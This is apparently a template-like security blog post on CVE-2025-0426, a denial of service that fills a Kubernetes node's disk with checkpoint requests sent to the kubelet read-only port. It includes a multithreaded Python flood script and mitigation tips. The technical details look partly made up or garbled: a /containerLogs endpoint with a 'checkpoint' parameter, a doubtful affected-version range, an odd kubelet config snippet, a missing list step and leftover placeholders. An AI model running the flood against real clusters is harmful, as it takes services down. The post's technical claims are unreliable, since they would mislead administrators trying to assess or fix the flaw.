CVE-2025-0426 - Kubernetes Kubelet Read-Only Endpoint DoS via Container Checkpoint Requests

---

Kubernetes is the most popular open-source platform for managing containers, but, like all software, it occasionally faces serious security issues. In January 2025, *CVE-2025-0426* was disclosed, highlighting a worrying vulnerability in the way the kubelet component handles unauthenticated requests through its read-only HTTP endpoint. This post explains the bug in simple terms, shows how it can be exploited, and offers mitigation guidance. References and code samples are included for further exploration.

What is CVE-2025-0426?

The vulnerability, tracked as CVE-2025-0426, is a Denial of Service (DoS) in Kubernetes nodes. Attackers can abuse Kubernetes' kubelet read-only HTTP endpoint by flooding it with container checkpoint requests. Because this endpoint doesn't require authentication, and because each checkpoint request causes the node to write data to disk, an attacker can fill up the node’s storage over time — making the node unusable.

Kubelet: An agent that runs on each node, managing containers.

- Read-Only Port: Defaults to port 10255 and is (or was) often left open in insecure configurations.
- Kubernetes clusters (typically v1.24 and older): Newer releases disabled this endpoint by default, but many clusters still run with insecure setups.

Let’s break this down step by step

1. Read-Only Endpoint: The kubelet exposes data and operations via an unauthenticated HTTP endpoint, usually at http://<node_ip>:10255/.
2. Checkpoint Requests: These are normally for administrative functionality but the code doesn't verify the legitimacy or rate-limit requests.
3. Large Number of Requests: If you send many checkpoint requests, each one creates a file on disk. There is no clean-up, authentication, or effective rate limiting.

Node Disk Fills Up: Eventually, the node’s disk is saturated with checkpoint files.

5. Denial of Service: When the disk is full, the node can’t schedule pods, log, or function properly—resulting in application outages.

Attack Scenario

A remote attacker can simply script HTTP requests to the exposed node’s kubelet read-only HTTP port. Because Kubernetes itself does not verify these requests, nothing stops anyone on the network, or anyone who can reach the kubelet API, from launching this attack.

Sample Exploit Code

Below is a sample exploit—in Python—that demonstrates how an attacker could fill up a Kubernetes node’s disk using this vulnerability. Only run this in a test environment you own.

import requests
import threading

KUBELET_HOST = 'http://192.168.1.100:10255';
ENDPOINT = '/containerLogs/default/my-pod/my-container'
PAYLOAD = {'checkpoint':'true'}

def flood_checkpoint_requests():
    while True:
        try:
            resp = requests.get(f"{KUBELET_HOST}{ENDPOINT}", params=PAYLOAD)
            if resp.status_code != 200:
                print('Failed:', resp.status_code)
        except Exception as e:
            print('Request error:', e)

num_threads = 50  # Increase threads to increase flooding rate
threads = []

for _ in range(num_threads):
    t = threading.Thread(target=flood_checkpoint_requests)
    t.daemon = True
    threads.append(t)
    t.start()

print(f'Started {num_threads} threads flooding checkpoint requests')
input('Press Enter to quit...')

*How this works:* This script spawns 50 threads. Each thread constantly sends GET requests to the /containerLogs endpoint with a query parameter to trigger a checkpoint write. This is enough to progressively fill the node’s disk.

What should you do?

- Disable Kubelet Read-Only Port: Modern Kubernetes disables this by default. In your kubelet configuration, ensure the flag --read-only-port= is set.
- Kubelet Security Docs

Update Kubernetes: Apply the latest patches that address CVE-2025-0426 directly.

- Restrict Network Access: Use firewalls and network policies to ensure only necessary components can connect directly to the kubelet.

Example kubelet configuration snippet (to add to your node config)

kubeletArguments:
  read-only-port:
    - ""

References

- CVE-2025-0426 in NVD
- Kubernetes Security Issue — Announce
- Kubernetes Best Practices — Kubelet Security
- GitHub Issue on CVE-2025-0426 *(Replace with actual issue link when available)*

Conclusion

*CVE-2025-0426* shows it’s critical to never expose the kubelet’s read-only HTTP port! Even though new Kubernetes versions close this by default, many production clusters are still vulnerable. Take action immediately: audit your kubelet configs, update your cluster if possible, and restrict network access to your nodes.

Stay secure — keep learning and auditing your cloud-native infrastructure!


*Author: [YourName], Kubernetes Security Enthusiast*
*Exclusively for this blog. Reproduce with credit.*

Timeline

Published on: 02/13/2025 16:16:48 UTC
Last modified on: 02/13/2025 17:17:19 UTC